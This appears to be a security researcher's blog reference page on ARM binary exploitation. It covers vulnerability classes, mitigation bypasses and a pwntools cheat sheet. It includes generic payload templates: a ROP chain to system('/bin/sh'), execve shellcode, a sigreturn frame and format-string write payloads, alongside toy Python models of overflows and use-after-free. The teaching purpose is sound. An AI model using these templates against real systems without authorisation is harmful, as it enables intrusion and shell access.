
~/posts/Binary Exploitation Techniques

<<< 2026/Apr/24 · security, exploitation >>>
ARM exploitation fundamentals, modern mitigation bypasses and pwntools workflow for building and delivering payloads.

Most of the targets I work with at Talos are ARM-based embedded devices or stripped binaries with no symbols. When a fuzzer surfaces a crash, the next question is always the same: what class of bug is this, and can it be turned into something more than a denial of service? This page is the reference I keep open during that triage. It covers ARM architecture details, the vulnerability classes that come up most often, and the pwntools calls I use to build and test payloads.

Overview

Binary exploitation turns software bugs (memory corruption, logic flaws, integer errors) into controlled execution. Modern targets combine multiple mitigations — ASLR, DEP/NX, stack canaries — so successful exploits chain techniques together rather than relying on a single primitive.

This page focuses on ARM exploitation concepts and the pwntools framework used to build and deliver payloads.

ARM architecture basics

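ARM (Advanced RISC Machine) is a RISC load/store architecture. In 32-bit ARM state every instruction is 32 bits wide (16 or 32 bits in Thumb state), and there are sixteen core registers: r0–r12 are general purpose, r13 is the stack pointer (sp), r14 is the link register (lr) that holds the return address, and r15 is the program counter (pc).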

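ARM64 (AArch64) extends this to 64-bit with 31 general-purpose registers (x0–x30, where x30 serves as the link register). sp and pc still exist but are no longer general-purpose registers, so pc can only be changed through branch instructions such as ret and br.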

Vulnerability classes

Stack buffer overflow

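Overflow a stack variable to overwrite the saved return address. On ARM the return address lives in LR; a non-leaf function pushes LR to the stack in its prologue and typically pops it straight into PC in its epilogue. That saved LR slot is the key target: once it is overwritten, the function's return redirects execution to an attacker-chosen address.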
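
A minimal sketch of the resulting payload layout, using only the standard library. The 64-byte buffer, the single saved register in front of LR, and the target address are all assumptions for illustration; real values come from the crash and the disassembly.

```python
import struct

# Hypothetical frame layout for a non-leaf 32-bit ARM function:
#   [ 64-byte buffer ][ saved r11 ][ saved LR ]
BUF_SIZE = 64          # assumed buffer size
SAVED_REGS = 4         # assumed: one 4-byte saved register (r11) before LR
TARGET = 0x00010554    # hypothetical address to return to

def build_overflow(buf_size: int, saved_regs: int, target: int) -> bytes:
    """Pad up to the saved LR slot, then overwrite it (little-endian)."""
    padding = b"A" * (buf_size + saved_regs)
    return padding + struct.pack("<I", target)

payload = build_overflow(BUF_SIZE, SAVED_REGS, TARGET)
print(len(payload), payload[-4:].hex())
```

The last four bytes are what the epilogue would load into PC; everything before them is filler.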

Heap buffer overflow

The heap holds dynamically allocated chunks. Overflowing a heap chunk can corrupt adjacent metadata or function pointers. Unlike a stack overflow, the payoff is not immediate at function return — it fires when the overwritten pointer is dereferenced. This makes heap exploits more timing-sensitive and layout-dependent.
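
The delayed payoff can be modelled with a flat buffer. This is a toy, not a real allocator: the 16-byte chunk size, the handler address, and the helper names are hypothetical.

```python
import struct

# Toy heap: two adjacent 16-byte chunks in one flat buffer.
# Chunk A (offset 0) is a data buffer; chunk B (offset 16) starts with a
# 4-byte "function pointer". Sizes and addresses are hypothetical.
CHUNK = 16
LEGIT_HANDLER = 0x00010400
heap = bytearray(2 * CHUNK)
struct.pack_into("<I", heap, CHUNK, LEGIT_HANDLER)

def unchecked_copy(heap: bytearray, offset: int, data: bytes) -> None:
    """Models a memcpy into chunk A with no bounds check."""
    heap[offset:offset + len(data)] = data

def handler_of_b(heap: bytearray) -> int:
    """Models the later read of chunk B's function pointer."""
    return struct.unpack_from("<I", heap, CHUNK)[0]

# 16 bytes fill chunk A; the next 4 spill into chunk B's pointer.
unchecked_copy(heap, 0, b"A" * CHUNK + struct.pack("<I", 0x41414141))

# Nothing happens at the overflow itself. The corruption only matters
# when the pointer is read back and called.
corrupted = handler_of_b(heap)
print(hex(corrupted))
```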

Use-after-free (UAF)

A pointer is used after the memory it references has been freed. Exploitation steps:

  1. Trigger the free of the target heap object.
  2. Reclaim the freed region with attacker-controlled allocation.
  3. Prepare a ROP payload at a known address.
  4. Overwrite function pointers in the reclaimed chunk.
  5. Trigger the code path that dereferences the freed pointer.
  6. Control jumps to the ROP payload.

Summary: free → overwrite → use.
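
The free, reclaim, use sequence can be sketched with a toy allocator. Real allocators are far more involved; the LIFO reuse policy and every name below are assumptions chosen to make the dangling reference visible.

```python
class ToyHeap:
    """Toy allocator that reuses the most recently freed slot first (LIFO)."""

    def __init__(self):
        self.slots = {}       # slot id -> contents
        self.free_list = []   # freed slot ids, most recent last
        self.next_id = 0

    def alloc(self, contents):
        if self.free_list:
            slot = self.free_list.pop()
        else:
            slot = self.next_id
            self.next_id += 1
        self.slots[slot] = contents
        return slot

    def free(self, slot):
        # The slot is marked reusable, but old references to it still work.
        self.free_list.append(slot)

heap = ToyHeap()
victim = heap.alloc({"handler": "legit_callback"})
heap.free(victim)                                        # step 1: free
attacker = heap.alloc({"handler": "attacker_chosen"})    # steps 2 and 4: reclaim, overwrite
called = heap.slots[victim]["handler"]                   # step 5: use of the stale reference
print(attacker == victim, called)
```

The stale `victim` handle and the fresh `attacker` handle name the same slot, which is the whole bug.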

Off-by-one / one-byte overflow

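An off-by-one writes exactly one byte past a buffer boundary. On 32-bit ARM, corrupting the least significant byte of a saved stack pointer or frame pointer can be enough to redirect control flow, because the caller then resumes with a shifted frame and later loads its own return address from the wrong place.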
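
A small worked example of the one-byte effect, assuming a little-endian target, a 16-byte buffer sitting directly below the saved frame pointer, and a hypothetical saved value:

```python
import struct

saved_fp = 0xBEFFF4A8   # hypothetical saved frame pointer
# Assumed layout: 16-byte buffer immediately followed by the saved FP.
frame = bytearray(b"B" * 16 + struct.pack("<I", saved_fp))

# A string copy of exactly 16 characters writes its NUL terminator at
# index 16, which is the least significant byte of the saved FP.
frame[16] = 0x00

corrupted_fp = struct.unpack_from("<I", frame, 16)[0]
shift = saved_fp - corrupted_fp
print(hex(corrupted_fp), shift)
```

The frame pointer moves to a lower address, which on a downward-growing stack tends to land in locals such as the overflowed buffer itself.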

Integer overflow

Sizing and casting bugs — mixing short/int/long or signed/unsigned types — can produce an unexpectedly small allocation size. The caller then writes more data than the allocation can hold, overflowing into adjacent memory.
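
The wraparound is easy to reproduce with plain arithmetic. This sketch assumes the size is computed with a 32-bit unsigned multiply; the element count is a hypothetical attacker-supplied value.

```python
def alloc_size_u32(count: int, elem_size: int) -> int:
    """Size as a 32-bit unsigned multiply would compute it (wraps mod 2**32)."""
    return (count * elem_size) & 0xFFFFFFFF

count = 0x40000001   # hypothetical attacker-supplied element count
elem_size = 4

allocated = alloc_size_u32(count, elem_size)   # what the allocator is asked for
intended = count * elem_size                   # what the copy loop will write
print(allocated, intended)
```

The allocation is 4 bytes while the subsequent write is sized for more than 4 GiB of elements.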

Bypassing mitigations

DEP / NX — Return Oriented Programming (ROP)

ROP chains small existing code sequences ("gadgets") that each end in a return-style instruction: ret on x86 and AArch64, pop {..., pc} or bx lr on 32-bit ARM. Because gadgets already live in executable memory, NX never comes into play. The chain is placed on the stack; redirecting PC to the first gadget drives execution through the sequence.
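
A minimal sketch of a 32-bit ARM chain built by hand with the standard library. All three addresses are hypothetical placeholders; real ones come from a gadget search against the target and its libraries.

```python
import struct

# Hypothetical addresses for illustration only.
POP_R0_PC = 0x00010A4C   # gadget: pop {r0, pc}
BIN_SH    = 0x0002F1B0   # address of a "/bin/sh" string
SYSTEM    = 0x00010420   # address of system()

def le32(value: int) -> bytes:
    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value)

chain = b"".join([
    le32(POP_R0_PC),   # lands in the saved LR slot: first gadget
    le32(BIN_SH),      # popped into r0 (first argument)
    le32(SYSTEM),      # popped into pc
])
print(chain.hex())
```

Each gadget's final pop into pc consumes the next word on the stack, which is what keeps the chain moving.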

Runtime memory patching via ROP: overwrite a critical variable without injecting shellcode — useful when only a flag needs flipping.

ASLR

Two strategies:

  - Bruteforce: practical only on 32-bit (limited address space, ~16-bit entropy).
  - Information leak: read a pointer from process memory (e.g., via format string: %p leaks stack addresses). Compute the ASLR slide as leaked_address - static_address. Apply the slide to relocate any gadget or function.
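
The slide arithmetic, worked through with hypothetical numbers. The static offsets and the leaked address below are made up; in practice the offsets come from the library file and the leak from the target.

```python
# Hypothetical values for illustration only.
STATIC_PUTS   = 0x0006F690   # offset of puts in the library file
STATIC_SYSTEM = 0x0004F4E0   # offset of system in the library file
leaked_puts   = 0xB6E5D690   # runtime address of puts, read from the leak

# slide = leaked_address - static_address
slide = leaked_puts - STATIC_PUTS

# Sanity check: a load base should be page-aligned.
assert slide & 0xFFF == 0, "leak or static offset is probably wrong"

# Apply the slide to relocate any other symbol or gadget.
system_runtime = STATIC_SYSTEM + slide
print(hex(slide), hex(system_runtime))
```

The alignment check is cheap and catches most cases where the leaked value was not the pointer it was assumed to be.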

pwntools reference

Process interaction

from pwn import *

p = process('./target')
p = remote('127.0.0.1', 1337)
p = process(['./target', '--arg'], env={'VAR': 'val'})

# Attach GDB to running process
gdb.attach(p)

# Start under GDB with ASLR disabled
p = gdb.debug('./target', aslr=False, gdbscript='b *main+123')

# I/O
p.send(b'data')           # write without newline
p.sendline(b'data')       # write with newline
p.recv(n)                 # read n bytes
p.recvline()              # read until \n
p.recvuntil(b'prompt')    # read until delimiter (bytes, not str, on Python 3)
p.sendlineafter(b'> ', b'payload')
p.interactive()           # hand control to terminal

Context

context.arch = 'aarch64'   # or 'arm', 'amd64', 'i386'
context.endian = 'little'  # or 'big'
context.log_level = 'info' # 'debug' | 'warn' | 'error'

Encoding and packing

# Integer <-> bytes (little-endian by default)
p32(0xdeadbeef)   # → b'\xef\xbe\xad\xde'
p64(0xcafebabe)
u32(b'\xef\xbe\xad\xde')  # → 0xdeadbeef

# Cyclic sequences to find offsets
cyclic(32)                      # → b'aaaabaaacaaa...'
cyclic_find(0x61616164)         # → 12  (byte offset)

ELF introspection

elf = ELF('./target')
elf.plt.puts          # address of puts@PLT
elf.got['puts']       # address of puts@GOT
elf.sym['main']       # symbol address

# Set base address after leaking it (for ASLR bypass)
libc = ELF('./libc.so.6')
libc.address = leaked_libc_base
libc.sym.puts         # now correctly rebased
bin_sh = next(libc.search(b'/bin/sh'))

ROP chain building

rop = ROP(elf)

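# Find specific gadgets (register names here are amd64; they follow the binary's architecture)
pop_rdi = rop.rdi.address
syscall = rop.find_gadget(['syscall', 'ret']).address

# Build chain
rop.call(elf.sym.puts, [elf.got['puts']])   # leak puts address
# libc.sym.system and bin_sh are only valid once libc.address is set from the leak,
# so in practice this call goes in a second-stage chain
rop.call(libc.sym.system, [bin_sh])          # shell

payload = b'A' * offset + rop.chain()       # offset: bytes up to the saved return address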

Shellcraft and assembly

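shellcode = shellcraft.sh()          # /bin/sh via execve, generated for context.arch
payload = asm(shellcode)             # asm() already returns bytes

# Or manually (amd64 example; requires context.arch = 'amd64')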
shellcode = asm('''
    lea rdi, [rip+bin_sh]
    xor rsi, rsi
    xor rdx, rdx
    mov rax, SYS_execve
    syscall
bin_sh:
    .string "/bin/sh"
''')

SROP (Sigreturn ROP)

Used when gadget availability is limited. A sigreturn syscall restores a full register context from the stack, giving full control over all registers in one shot.

# Register names below are amd64; set context.arch = 'amd64' before creating the frame
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr
payload = b'A' * offset + p64(sigret_gadget) + bytes(frame)

Format string exploits

# Automated payload for arbitrary writes
writes = {target_addr: value}
payload = fmtstr_payload(offset, writes)

# Auto-detect offset (FmtStr calls send_data repeatedly, so start a fresh process each time)
def send_data(payload):
    io = process('./target')
    io.sendline(payload)
    return io.recvall()
fmt = FmtStr(execute_fmt=send_data)
offset = fmt.offset

What I reach for first

Stack buffer overflows are the starting point: straightforward offset calculation with cyclic, confirm PC control, then layer in a ROP chain to bypass NX. For targets where ASLR is the main obstacle, I look for a format string primitive first — a single %p leak often collapses the address space problem before anything else needs solving.
